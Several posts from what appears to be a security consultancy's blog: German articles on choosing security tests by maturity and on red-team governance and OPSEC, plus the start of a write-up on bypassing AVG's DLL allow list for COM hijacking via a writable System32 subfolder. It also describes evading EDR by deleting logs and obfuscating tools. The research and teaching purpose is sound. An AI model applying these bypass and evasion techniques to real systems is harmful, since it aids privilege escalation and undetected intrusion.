Search

Reife­grad für Sicherheits­über­prüfungen

Search

Reife­grad für Sicherheits­über­prüfungen

May 11, 2026

Reifegrad für Sicherheitsüberprüfungen: die richtige Prüfung zur richtigen Zeit

Auf den cirosec TrendTagen habe ich kürzlich einen Vortrag zum Thema Pentesting, Assumed Breach, Red Teaming, TLPT & Co. gehalten. Besonders die grafische Einordnung der einzelnen Prüfungsformen nach Reifegrad und Budget stieß auf großes Interesse. Eine kurze Zusammenfassung zum Nachlesen:

Eine Sicherheitsprüfung ist nur dann effizient, wenn sie zum Reifegrad des Unternehmens passt. Wer seine Hausaufgaben bei der Basis-Hygiene noch nicht gemacht hat, verschwendet mit einem komplexen Red Teaming wertvolle Ressourcen und kann vom Mehrwert eines derartigen Projekts nicht profitieren.

Netzwerkscans, Penetrationstests von Anwendungen oder Initial-Access-Prüfungen benötigen kaum Voraussetzungen. Hier geht es darum, effizient Schwachstellen zu finden. Bei einer Assumed-Breach-Analyse liegt der Fokus auf der Identifikation von Schwachstellen im internen Netzwerk und im Active Directory. Erkennungs- und Reaktionsfähigkeiten spielen dabei noch keine Rolle. Dadurch lassen sich derartige Prüfungen mit einem überschaubaren Budget durchführen. Dies erlaubt auch eine entsprechende Regelmäßigkeit.

Sobald Erkennungs- und Reaktionsfähigkeiten vorhanden sind, werden Purple Teamings / War Gamings oder Assumed Breach Red Teamings relevant. Hierbei wird nicht mehr nur die Prävention geprüft, sondern gezielt das Zusammenspiel zwischen Angriff (Red-Team) und Verteidigung (Blue-Team) trainiert.

Klassisches, kompaktes und kontinuierliches Red Teaming setzt eine solide Infrastruktur und etablierte Incident-Response-Prozesse voraus. Das Ziel ist die Simulation realer, langanhaltender Angriffe. Solche Projekte zielen in der Regel auf das gesamte Unternehmen ab und liefern Erkenntnisse auf unterschiedlichsten Ebenen.

Eine besondere Form des Red-Team-Assessments ist der Threat-led Penetration Test (TLPT) nach TIBER. Diese Durchführungsform ist jedoch nur für besonders reife Unternehmen aus dem Finanzsektor relevant. Detaillierte Informationen dazu finden Sie im separaten Blogpost zu diesem Thema.

Zusammengefasst: Man muss nicht mit einem Red Teaming starten. Wer sich bei der Durchführung von Sicherheitsüberprüfungen am Reifegrad orientiert, baut Sicherheit nachhaltig und budgetgerecht auf. Unternehmen mit einem fortgeschrittenen Reifegrad profitieren hingegen von den Erkenntnissen aus den ganzheitlichen Angriffen eines Red-Team-Assessments.

Eine Übersicht zu möglichen Schwerpunkten von Penetrationstests und Red-Team-Assesessments gibt es auf unserer Website.

Michael Brügge

Managing Consultant

Category
Date

Further blog articles

Red Teaming

Windows Instrumen­tation Call­backs – Part 4

February 10, 2026 – In this blog post we will cover ICs from a more theoretical standpoint. Mainly restrictions on unsetting them, how set ICs can be detected and how new ones can be prevented from being set. Spoiler: this is not entirely possible.

Author: Lino Facco

Mehr Infos »
Reverse Engineering

Windows Instrumen­tation Call­backs – Part 3

January 28, 2026 – In this third part of the blog series, you will learn how to inject shellcode into processes with ICs as an execution mechanism without creating any new threads for your payload and without installing a vectored exception handler.

Author: Lino Facco

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

Effektive Governance-Strategien im Red Teaming

Search

Effektive Governance-Strategien im Red Teaming

June 30, 2025

Effektive Governance-Strategien im Red Teaming: Kommunikation, Risikoanalyse und OPSEC

This blog post is written in German. A summary is provided in English.

Summary

This blog post explores effective governance strategies in red teaming, with particular focus on customer consultation, risk management, OPSEC, and the use of AI technologies.

Abstrakt

In diesem Blogbeitrag werden effektive Governance-Strategien im Red Teaming unter besonderer Berücksichtigung von Kundenabstimmung, Risikomanagement, OPSEC und dem Einsatz von KI-Technologien untersucht.

Die rasante Weiterentwicklung von KI-Technologien, wie beispielsweise LLMs, ermöglicht es Angreifern, Phishing-Angriffe automatisiert und überzeugend durchzuführen – eine Entwicklung, die eine optimale Vorbereitung der Blue-Teams und regelmäßige Überprüfungen der IT-Sicherheitsinfrastrukturen unerlässlich macht. Basierend auf der Definition von Governance und dem umfassenden Ansatz des Red Teaming wird gezeigt, wie sich durch klar definierte Testparameter, strukturierte Kommunikationsstrategien und präzise Risikobewertungen Sicherheitsüberprüfungen zur Identifikation von Schwachstellen in Produktivsystemen risikominimiert durchführen lassen. Die Methodik kombiniert eine dokumentenbasierte Analyse relevanter Normen mit empirischen Daten aus internen Experteninterviews, um Einblicke in die Umsetzung von Governance im Red Teaming zu gewinnen.

Einführung

Die kontinuierliche Weiterentwicklung von Angriffstechniken und der dazugehörigen Erkennungs- und Reaktionsmöglichkeiten sorgt dafür, dass sich die Bedrohungslandschaft ständig verändert – insbesondere durch den Boom von KI-Technologien, die sowohl Angreifern als auch Verteidigern mächtige Werkzeuge an die Hand geben. In diesem dynamischen Umfeld ist es entscheidend, Schwachstellen auf allen Ebenen – von der Infrastruktur über Prozesse bis hin zu menschlichen Faktoren – genau zu kennen.

Traditionell wurden hierzu häufig Penetrationstests durchgeführt, die isoliert einzelne Aspekte detailliert beleuchteten. Allerdings besteht dabei die Gefahr, dass der ganzheitliche Überblick verloren geht. Daher setzen immer mehr Unternehmen auf Red-Team-Assessments, die einen umfassenden, ganzheitlichen Ansatz verfolgen. Bei diesen Assessments wird bewusst ein offener Scope gewählt, um realistische Angriffsszenarien zu simulieren und das Verhalten der Verteidiger unter realen Bedingungen zu testen.

Doch ein solcher Ansatz ist ohne eine solide Governance nicht denkbar. Governance stellt den strukturellen Rahmen bereit, in dem alle Aktivitäten – von der Festlegung des Scope über die Abstimmung mit dem Kunden bis hin zur kontinuierlichen Evaluierung der Ergebnisse – transparent und kontrolliert ablaufen. Somit bildet Governance die Grundlage für eine effektive Sicherheitsstrategie, die den aktuellen und zukünftigen Herausforderungen gerecht wird.

Definition von Governance im Red Teaming

Nach ISO 37000 umfasst Governance das System von Richtlinien, Strukturen und Prozessen, mit dem eine Organisation geführt und kontrolliert wird. Es stellt sicher, dass Entscheidungen im Einklang mit ethischen, rechtlichen und gesellschaftlichen Anforderungen getroffen werden, und definiert die Verantwortlichkeiten, die Zuständigkeiten sowie die Mechanismen zur Überwachung und Rechenschaftspflicht. Governance bildet somit den Rahmen, in dem strategische Ziele gesetzt, Risiken gemanagt und die Leistung kontinuierlich verbessert werden – stets unter Berücksichtigung der Interessen aller Stakeholder.

Red Teaming ist ein umfassender, angreifergetriebener Ansatz, der darauf abzielt, durch realitätsnahe Angriffssimulationen Schwachstellen in technischen Systemen, organisatorischen Abläufen und im Verhalten von Menschen aufzudecken und auszunutzen. Im Gegensatz zu herkömmlichen Penetrationstests, die den Fokus auf die Identifikation möglichst vieler Sicherheitslücken innerhalb eines Prüfgegenstands legen, bewertet Red Teaming die gesamte Sicherheitsarchitektur einer Organisation. Dabei werden nicht nur technische Defizite, sondern auch Reaktionsmechanismen und das Sicherheitsbewusstsein der Mitarbeiter unter möglichst realistischen Bedingungen getestet.

Im Gegensatz zu einem klassischen Penetrationstest werden Red-Team-Assessments typischerweise verdeckt durchgeführt. Dies stellt einen wesentlichen Unterschied dar und ermöglicht es daher, die Erkennungs- und Reaktionsfähigkeiten des Blue-Teams zu überprüfen und zu trainieren.

Die Integration von Governance in den Red-Teaming-Prozess stellt sicher, dass alle Testaktivitäten unter klar definierten Verantwortlichkeiten, standardisierten Abläufen und regelmäßigen Kontrollen erfolgen. So wird gewährleistet, dass Red-Team-Assessments transparent, ethisch und rechtssicher durchgeführt werden.

Zielsetzung des Blogbeitrags

Das Ziel dieses Beitrags besteht darin, effektive Governance-Strategien im Red Teaming zu identifizieren und ihre Praxistauglichkeit zu bewerten. Im Mittelpunkt stehen dabei drei wesentliche Aspekte:

Kundenabstimmung und Risikomanagement:
Es soll untersucht werden, wie klare Absprachen und eine akkurate Risikoanalyse einen sicheren Rahmen für Red-Team-Assessments schaffen.

OPSEC-Maßnahmen:
Es wird erörtert, wie durch gezielte operative Sicherheitsmaßnahmen – beispielsweise das Vier-Augen-Prinzip – die unauffällige Durchführung von Assessments gewährleistet werden kann.

Einsatz von KI:
Die Chancen und Herausforderungen, die sich durch den verstärkten Einsatz von KI-Technologien im Red Teaming ergeben, werden analysiert.

Die daraus gewonnenen Erkenntnisse sollen als praxisorientierter Leitfaden dienen und Unternehmen dabei unterstützen, Red-Team-Assessments sicher, effektiv und im Einklang mit strategischen sowie regulatorischen Vorgaben durchzuführen.

Methodik

Für die Bearbeitung dieses Themas wurden dokumentenbasierte Analyse und empirische Erhebung kombiniert.

Dokumentenbasierte Analyse:
Zunächst werden relevante Normen und offizielle Dokumente ausgewertet, um die theoretischen Grundlagen von Governance und Red Teaming zu erfassen.

Empirische Datenerhebung:
Ergänzend dazu fließen Daten aus internen Experteninterviews in die Untersuchung ein. Diese Interviews liefern praxisnahe Einblicke in die Umsetzung von Governance-Strategien im Red Teaming.

Kundenabstimmung und Risikomanagement

Die umfangreiche und präzise Abstimmung mit dem Kunden ist das Fundament eines erfolgreichen Red-Team-Assessments. Nur durch klare Kommunikation und detaillierte Vereinbarungen lassen sich Risiken minimieren und ein reibungsloser Projektablauf erreichen. Im Folgenden werden alle wesentlichen Aspekte jener Kundenabstimmung zusammengefasst.

Kundenabsprachen

Klare Kundenabsprachen dienen dazu, Missverständnisse zu vermeiden und unerwünschte Eingriffe in das Produktionssystem des Kunden auszuschließen. Vor Beginn eines Assessments müssen mehrere zentrale Punkte abgestimmt werden, um einen reibungslosen und sicheren Ablauf zu gewährleisten:

Verantwortlichkeiten:
Es wird eindeutig festgelegt, wer als primärer Ansprechpartner fungiert – typischerweise ein CISO oder eine andere verantwortliche Person. Dies schafft klare Kommunikationslinien und stellt sicher, dass im Falle von Fragen oder Problemen schnell reagiert werden kann.

Zieldefinition und Scope:
Der Prüfungsumfang wird detailliert festgehalten, indem alle relevanten Aspekte, wie bspw. die anzugreifenden IP-Adressbereiche, Standorte, Systeme und Mitarbeiter, erfasst werden. Eine präzise Scope-Erfassung verhindert, dass Bereiche ungewollt getestet werden, und ermöglicht eine zielgerichtete Analyse der Sicherheitsinfrastruktur.

Testparameter – Zeitrahmen und Ausschlüsse:
Es wird ein klarer Zeitrahmen für das Assessment festgelegt und es werden explizite Ausschlüsse definiert, um kritische Systeme zu schützen. Die Festlegung von Rules of Engagement regelt zudem, welche Angriffstechniken, wie etwa Social Engineering, zulässig sind.

Formale Dokumentation:
Durch die Erstellung eines detaillierten Aufklärungsbogens werden alle vereinbarten Testbereiche und Risiken schriftlich festgehalten. Ergänzend wird eine sogenannte „Get-out-of-Jail-Free-Card“ ausgestellt, welche die Legitimität durchgeführter Angriffe vom Auftraggeber bescheinigt und im Zweifelsfall zur Klärung einer Situation genutzt werden kann.

Bild 1: Kundenabsprache

Diese Vereinbarungen werden typischerweise in einem ausführlichen Kick-off-Workshop erarbeitet, der den Rahmen für das gesamte Assessment definiert. Zusätzlich finden regelmäßige Jour-fixe-Termine statt, in denen der aktuelle Stand des Assessments, potenzielle Risiken und angedachte Angriffsszenarien kontinuierlich besprochen werden. Durch diesen strukturierten Kommunikationsprozess wird sichergestellt, dass alle Parteien – sowohl intern als auch seitens des Kunden – stets über den Umfang und die Grenzen des Assessments informiert sind. Dies trägt maßgeblich dazu bei, dass das Red-Team-Assessment unter klar definierten, sicheren Rahmenbedingungen durchgeführt wird.

Risikobewertung: Angriffsauswirkungen auf Produktivsysteme

Die Risikobewertung geplanter Angriffe spielt eine entscheidende Rolle im Verlauf eines Red-Team-Assessments. Hierbei muss im Vorhinein präzise evaluiert werden, wie mögliche Schäden und Eintrittswahrscheinlichkeiten minimiert werden.

Ein Beispiel hierfür wäre die Planung eines Passwort-Spraying-Angriffs. Dabei versucht der Angreifer, im Gegensatz zum herkömmlichen Brute-Force-Angriff nicht die Anmeldung eines Users mit vielen Passwörtern zur erraten, sondern testet mithilfe weniger, möglichst allgemeiner Passwörter (Firma2025, Sommer2025 etc.) alle ihm bekannten Useranmeldungen. In der Regel existieren Maßnahmen zum Schutz von Benutzerkonten vor derartigen Angriffen. Dabei führen zu viele fehlgeschlagene Anmeldeversuche zu einer Sperrung des betroffenen Kontos. Da ein Passwort-Spraying-Angriff auf eine breite Benutzerbasis abzielt, besteht somit das Risiko, massenhaft Benutzerkonten zu sperren und so das produktive Arbeitsgeschehen zu beeinträchtigen.

Um solche Szenarien zu vermeiden, werden zum einen die Risiken möglicher Angriffe schriftlich im Aufklärungsbogen vor jedem Assessment festgehalten, um so den Kunden möglichst gut über potenzielle Risiken aufzuklären. Zum anderen sollten kritische Angriffe in regelmäßigen Jour-fixe-Terminen präventiv besprochen und bewertet werden.

Kommunikationsstrategien mit dem Kunden

Der Kick-off-Workshop stellt einen essenziellen Bestandteil der Vorbereitungsphase dar. In diesem Treffen werden alle relevanten Aspekte des Red-Team-Assessments im Detail besprochen. Dabei werden unter anderem der Prüfumfang, bestehend aus Scope und Prüfzeitraum, die festgelegten Rules of Engagement, die Benennung der Ansprechpartner sowie die Abgrenzung der Testbereiche definiert. Durch die frühzeitige Klärung dieser Parameter wird sichergestellt, dass alle Beteiligten, sowohl auf Kundenseite als auch innerhalb des Red-Teams, ein gemeinsames Verständnis der Ziele, Vorgehensweisen und Grenzen haben.

Da Red-Team-Assessments immer unvorhersehbare Entwicklungen aufweisen können, ist es entscheidend, vor Beginn jedes Assessments eine Kommunikationsstruktur mit dem Kunden aufzubauen. Durch die Einrichtung von Ad-hoc-Messenger-Gruppen, in denen alle relevanten Ansprechpartner gebündelt sind, wird sichergestellt, dass im Notfall umgehend und effizient kommuniziert werden kann – sodass zeitnah Unterstützung und Klärung gewährleistet sind.

Zusätzlich zu den Ad-hoc-Messenger-Gruppen bilden regelmäßige Jour-fixe-Termine einen zentralen Bestandteil der Kommunikationsstrategie. Diese fest eingeplanten Besprechungen ermöglichen einen kontinuierlichen Austausch zwischen dem Red-Team und den Ansprechpartnern beim Kunden. In diesen Meetings werden aktuelle Ergebnisse, mögliche Abweichungen vom geplanten Ablauf und potenzielle Risiken durch geplante Angriffe erörtert. So können frühzeitig auf unvorhergesehene Entwicklungen reagiert und notwendige Anpassungen im Prüfablauf vereinbart werden. Durch diesen strukturierten Kommunikationsrhythmus wird gewährleistet, dass alle Beteiligten stets auf dem neuesten Stand sind und im Ernstfall schnell und effektiv unterstützt werden können.

OPSEC im Red Teaming

Im Rahmen von Red-Team-Assessments spielt die operative Sicherheit (OPSEC) eine entscheidende Rolle. Während technische Prüfungen und strategische Abstimmungen wesentliche Bestandteile eines Assessments sind, stellt OPSEC sicher, dass die Angriffsaktivitäten möglichst unauffällig ablaufen und nicht zu unbeabsichtigten Alarmen führen. Des Weiteren soll sie dafür sorgen, dass keine Attribution zum Red-Team möglich ist. Das umfasst sowohl technische als auch organisatorische Maßnahmen, die vermeiden sollen, dass Angriffe durch abweichendes Verhalten, nicht obfuskierte Tools oder mangelnde interne Abstimmungen entdeckt werden. Die konsequente Anwendung von OPSEC-Prinzipien ist daher ein wichtiger Bestandteil, um den Erfolg eines jeden Red-Team-Assessments sicherzustellen.

Prinzipien der Tarnung: Vermeidung von Identifikation durch den Kunden

Im Rahmen von Red-Team-Assessments ist es essenziell, die Aktivitäten des Red-Teams so auszuführen, dass sie für den Kunden nicht als gezielte Sicherheitsüberprüfung erkennbar sind. Dies wird erreicht durch eine Kombination aus technischen und organisatorischen Maßnahmen:

Technische Maßnahmen:
Technische Maßnahmen im Red Teaming beinhalten einige Ansätze, die darauf abzielen, die digitalen Spuren von Angriffen möglichst zu minimieren und deren Erkennung durch Sicherheitsmechanismen wie EDR- und SIEM-Systeme durch Anomalieerkennung zu verhindern. Ein zentraler Aspekt ist dabei die weitgehende Eliminierung von Log-Einträgen, die auf verdächtige Aktivitäten hinweisen könnten. Dies umfasst nicht nur das gezielte Löschen oder Verschleiern von Protokolldaten, sondern auch die Anpassung von Angriffstechniken, sodass sie sich nahtlos in den normalen Systembetrieb einfügen.

Ein wesentlicher Punkt ist die Modifikation von Angreifer-Tools, um deren Verhaltensmuster zu normalisieren. Standardmäßig eingesetzte Tools wie Mimikatz weisen oft charakteristische Signaturen und Abläufe auf, die von EDR-Systemen oder Sicherheitsanalysten schnell erkannt werden können. Daher sollte der Einsatz von nicht obfuskierten Versionen solcher Tools idealerweise vermieden werden. Falls der Einsatz unumgänglich ist, müssen zusätzliche Obfuskierungstechniken angewendet werden. Dies kann durch das Einführen von Verschleierungsmethoden erfolgen, die den Code modifizieren oder variabel gestalten, sodass dessen typische Signaturen nicht mehr identifizierbar sind.

Zusätzlich wird empfohlen, dynamische Parameter in den Tools zu implementieren, um das Verhalten unvorhersehbar zu machen und somit den Vergleich mit bekannten Mustern zu erschweren. All diese Maßnahmen tragen dazu bei, dass Angriffsaktivitäten im System als normale, unauffällige Vorgänge interpretiert werden und die Wahrscheinlichkeit einer Identifikation durch automatisierte Systeme oder manuelle Analysen signifikant sinkt.

Organisatorische Maßnahmen:
Die Einhaltung interner OPSEC-Richtlinien wird maßgeblich durch das konsequente Anwenden des Vier-Augen-Prinzips bei kritischen Aktionen unterstützt. Dies bedeutet, dass bei sensiblen Schritten stets mindestens zwei Teammitglieder involviert sind, um die Durchführung zu überwachen, Entscheidungen gemeinsam zu validieren und so das Risiko von Informationslecks deutlich zu reduzieren. Durch diese Maßnahmen wird effektiv verhindert, dass Rückschlüsse auf die Identität und Vorgehensweise des Red-Teams gezogen werden können, wodurch die Diskretion und Sicherheit der Operationen gewährleistet sind.

Fallbeispiel: Konsequente OPSEC

Ein praxisnahes Fallbeispiel verdeutlicht eindrücklich die Bedeutung einer konsequenten Umsetzung von Governance-Richtlinien im Bereich der OPSEC während eines Red-Team-Assessments. In einem Assessment wurde ein Rechtschreibfehler in der Konfiguration eines Softwareverteilungsprogramms festgestellt, das vom Red-Team verwendet wurde. Dieser vermeintlich unbedeutende Fehler ermöglichte es einem Blue-Team-Analysten, auf Aktivitäten des Red-Teams im System des Kunden zu schließen.

Obwohl der Fehler innerhalb des Red-Teams erkannt wurde, wurde die Korrektur auf den Folgetag verschoben. Diese Verzögerung bot dem Blue-Team ausreichend Zeit, den Fehler als Indiz zu nutzen und somit die Angriffsaktivitäten zu entlarven. Dadurch konnte der Kunde seine Reaktionsfähigkeiten prüfen und trainieren. Das Red-Team musste anschließend neue Wege zur weiteren Ausbreitung im internen Netz identifizieren und ausnutzen.

Dieses Beispiel zeigt, wie entscheidend es ist, auch kleinste Unstimmigkeiten sofort zu beheben und strikte OPSEC-Maßnahmen umzusetzen. Die lückenlose Einhaltung von Governance-Richtlinien – von der präzisen Konfiguration bis hin zur sofortigen Reaktion auf Fehler – ist unerlässlich, um die Diskretion des Red-Teams zu wahren und die Integrität des Assessments sicherzustellen.

KI im Red Teaming

Im Red Teaming werden KI-gestützte Tools bereits experimentell eingesetzt, beispielsweise zur Feinabstimmung von E-Mail-Inhalten mithilfe von ChatGPT oder Gemini sowie zur Unterstützung bei Scripting-Aufgaben. KI birgt insbesondere Potenziale im Bereich des Social Engineering, indem sie hilft, authentische Kommunikationsmuster zu generieren und die Erstellung sowie Anpassung von Skripten effizienter zu gestalten.

Risiken und Einschränkungen

Der Einsatz KI-gestützter Tools birgt Risiken, die vor allem den Umgang mit sensiblen Daten betreffen. Strenge Datenschutzvorgaben (z. B. DSGVO) müssen eingehalten werden, um unbefugten Zugriff zu verhindern. Fehler in der Datenverarbeitung können zu ungenauen Ergebnissen führen, während mangelnde Transparenz der KI-Entscheidungsprozesse die Nachvollziehbarkeit erschwert. Zudem können Schwachstellen in den KI-Systemen selbst als neue Angriffsvektoren dienen. Insgesamt erfordert der KI-Einsatz eine sorgfältige Balance zwischen Innovation und strikten Sicherheits- und Compliance-Maßnahmen.

Zukünftige Entwicklungen

Zukünftige Entwicklungen könnten den Einsatz von KI bei der Automatisierung von Website-Fuzzing-Prozessen vorsehen, was einen groß angelegten Informationsgewinn ermöglichen würde – wenngleich diese Ansätze derzeit noch kostenintensiv sind. Ebenso wird der Einsatz von Deepfakes im Social Engineering als möglicher Trend betrachtet. Insgesamt wird erwartet, dass KI in Zukunft eine bedeutendere Rolle im Red Teaming einnehmen wird, wobei strikte Governance-Vorgaben und Datenschutz weiterhin zentrale Anforderungen bleiben.

Fazit und Ausblick

Im Anschluss wird ein Einblick in zukünftige Entwicklungen und Herausforderungen im Bereich der Governance-Strategien im Red Teaming gegeben und mögliche Ansätze für Optimierungen werden veranschaulicht.

Zusammenfassung der wichtigsten Erkenntnisse

In diesem Blogbeitrag wurde gezeigt, dass eine strukturierte Governance im Red Teaming essenziell ist, um ganzheitliche Sicherheitsüberprüfungen risikominimiert durchzuführen. Zu den zentralen Erkenntnissen zählen:

Klare Kundenabstimmung und Scope-Definition:
Durch präzise Festlegung des Prüfungsumfangs und regelmäßige Abstimmungen wird sichergestellt, dass Testaktivitäten eindeutig definiert und potenzielle Risiken frühzeitig erkannt werden.

Effektive OPSEC-Maßnahmen:
Die Kombination aus technischen und organisatorischen Maßnahmen – wie die Minimierung von Log-Spuren, der Einsatz obfuskierter Tools und das konsequente Vier-Augen-Prinzip – sorgt dafür, dass Angriffe unauffällig bleiben und nicht zu unbeabsichtigten Alarmen führen.

Integration von Governance-Prinzipien:
Die Einbindung von Governance-Standards in den gesamtenRed-Teaming-Prozess gewährleistet, dass sowohl interne Sicherheitsvorgaben als auch Kundenanforderungen eingehalten werden. Dies schafft einen strukturierten Rahmen, der den sicheren und effektiven Ablauf der Assessments unterstützt.

Chancen und Herausforderungen durch KI:
Der Einsatz von KI im Red Teaming eröffnet vielversprechende Möglichkeiten, wie die Automatisierung von Angriffsszenarien, eine präzisere Simulation von Social-Engineering-Angriffen und die Optimierung von Scripting-Aufgaben.

Bild 2: Bestandteile

Gleichzeitig bestehen jedoch große Herausforderungen: Strenge Datenschutzvorgaben und Compliance-Anforderungen müssen stets eingehalten werden, um sensible Daten zu schützen. Fehler in der KI-Datenverarbeitung oder mangelnde Transparenz der Entscheidungsprozesse können zu ungenauen Ergebnissen und neuen Angriffsvektoren führen. Insgesamt erfordert der KI-Einsatz eine ausgewogene Balance zwischen neuen Technologien und strikten Governance-Maßnahmen, um auf längere Sicht eine sichere und effektive Sicherheitsstrategie zu gewährleisten.

Zukunftsperspektiven

Die fortschreitende Integration von KI in das Red Teaming hat großes Potenzial für zukünftige Entwicklungen. So könnte die Automatisierung von Website-Fuzzing-Prozessen, unterstützt durch KI, zu einem breiten Informationsgewinn führen und dadurch die Effizienz bei der Identifikation von Schwachstellen deutlich erhöhen. Gleichzeitig bietet der Einsatz von Deepfakes im Bereich Social Engineering die Möglichkeit, noch realistischere Angriffsszenarien zu simulieren und die Reaktionsfähigkeit der Blue-Teams weiter zu testen.

Neben diesen Fortschritten wird es zukünftig zunehmend darauf ankommen, Governance-Prinzipien kontinuierlich an die wandelnden Anforderungen anzupassen. Dies bedeutet, dass strenge Datenschutz- und Compliance-Vorgaben und das konsequente Vier-Augen-Prinzip weiterentwickelt werden müssen, um den komplexeren Risiken im KI-gestützten Red Teaming gerecht zu werden. Die enge Verzahnung von innovativen KI-Technologien und bewährten Sicherheitsstrategien wird somit ein zentraler Erfolgsfaktor sein, um langfristig eine robuste und zukunftssichere Sicherheitsarchitektur zu gewährleisten.

Hannes Allmann

Dualer Student

Category
Date
Navigation

Further blog articles

Command-and-Control

Beacon Object Files for Mythic – Part 3

December 4, 2025 – This is the third post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this final post, we will provide insights into the development of our BOF loader as implemented in our Mythic beacon. We will demonstrate how we used the experimental Mythic Forge to circumvent the dependency on Aggressor Script – a challenge that other C2 frameworks were unable to resolve this easily.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 2

November 27, 2025 – This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

Author: Leon Schmidt

Mehr Infos »
Command-and-Control

Beacon Object Files for Mythic – Part 1

November 19, 2025 – This is the first post in a series of blog posts on how we implemented support for Beacon Object Files into our own command and control (C2) beacon using the Mythic framework. In this first post, we will take a look at what Beacon Object Files are, how they work and why they are valuable to us.

Author: Leon Schmidt

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 4

February 26, 2025 – In this final part of our series on COM hijacking, we will examine a custom-named pipe IPC protocol implemented by Bitdefender Total Security and detail our approach to reverse engineering it. We will explore how we could use COM hijacking and this custom communication to gain SYSTEM privileges (CVE-2023-6154). Additionally, we will examine how to mitigate the vulnerabilities discussed throughout this series of blog posts. Lastly, we will demonstrate how COM hijacking can be exploited to perform a Denial-of-Service (DoS) attack on security products.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 3

February 12, 2025 – In this third part of our blog post series, we will cover the details of two additional vulnerabilities we found based on COM hijacking. The first vulnerability impacted Webroot Endpoint Protect (CVE-2023-7241), allowing us to leverage an arbitrary file deletion to gain SYSTEM privileges. In the second case, we targeted Checkpoint Harmony (CVE-2024-24912) and used a file download primitive to gain SYSTEM privileges.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 2

January 29, 2025 – In this post, we will delve into how we exploited trust in AVG Internet Security (CVE-2024-6510) to gain elevated privileges.
But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Pentesting

TLPT: Bedroh­ungs­­­orientierte Penetra­tions­tests nach DORA

January 24, 2025 – Since January 17, 2025, the Digital Operational Resilience Act (DORA) has been put into practice. One important aspect of DORA is the requirement of regularly performing threat-led penetration tests (TLPT). Only selected entities within the financial sector are required to conduct TLPTs. Even though TLPTs sound like a new concept, they have actually existed in Germany since 2020 in form of TIBER tests. This blog post describes the concepts behind TLPTs and how they are conducted. Furthermore, alternatives for targeted and budget-oriented red team assessments are given.

Author: Michael Brügge

Mehr Infos »
Red Teaming

The Key to COMpromise – Part 1

January 15, 2025 – In this series of blog posts, we cover how we could exploit five reputable security products to gain SYSTEM privileges with COM hijacking. If you’ve never heard of this, no worries. We introduce all relevant background information, describe our approach to reverse engineering the products’ internals, and explain how we finally exploited the vulnerabilities. We hope to shed some light on this undervalued attack surface.

Author: Alain Rödel and Kolja Grassmann

Mehr Infos »
Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Mehr Infos »
Do you want to protect your systems? Feel free to get in touch with us.

The Key to COMpromise – Part 2

Search

The Key to COMpromise – Part 2

January 29, 2025

The Key to COMpromise - Abusing a TOCTOU race to gain SYSTEM, Part 2

Recap

In the first post of this blog series, we explored the architectural design of various security products and demonstrated how COM hijacking can be leveraged to exploit them: We examined a vulnerability that allowed us to replay a modified message over a named pipe, highlighting a potential attack vector.

As discussed previously, many security products have frontend processes operating in the context of an unprivileged user, which are capable of initiating privileged actions – such as adding exclusions  – by interacting with a backend service running at higher privileges. To prevent abuse, most vendors implement mechanisms to ensure these actions originate from trusted processes and take steps to protect those processes from tampering.

However, because frontend processes execute with limited user privileges, COM hijacking presents an opportunity to load a malicious DLL into the process. In our research, we found that this attack vector was viable across all the products we targeted, allowing us to exploit the security product’s inherent trust in its own processes.

To capitalize on this trust relationship, we needed to reverse engineer the communication protocols between the frontend and backend processes. This helped us identify interactions that could be manipulated to escalate privileges.

In this post, we will delve into how we exploited this trust in AVG Internet Security (CVE-2024-6510 ) to gain elevated privileges. But before that, the next section will detail how we overcame an allow-listing mechanism that initially disrupted our COM hijacking attempts.

Figure 1: User Interface of the AVG Internet Security Solution
Alain Rödel and Kolja Grassmann

Consultants

Category
Date
Navigation

Circumventing an allow list

For this part of our research, we employed the same basic technique as before, but with one key difference: this time, the COM interface was triggered each time we opened a file dialog to block an application. However, we encountered a restriction – we could not load our DLL from just any folder.

When trying to load the DLL from our custom folder at C:\poc, we could not observe any successful DLL load in the Process Monitor. In contrast, the original DLL path worked without issue.
Through trial and error, we discovered that placing our DLL in the  C:\Windows\system32 directory allowed it to load successfully. This behavior revealed that the product validates the DLL’s directory against an allow list, likely as a defense against DLL hijacking attacks.

While loading from C:\Windows\system32 bypassed the allow list, this approach was impractical for our privilege escalation since an unprivileged user cannot write to this directory. However, based on our prior experience bypassing AppLocker configurations, we knew that some subdirectories within C:\Windows\system32 were writable by unprivileged users. One such directory is C:\Windows\System32\spool\drivers\color. By placing the DLL used for the COM hijacking in this writable subdirectory, we successfully bypassed the allow list and achieved code execution in the frontend process.

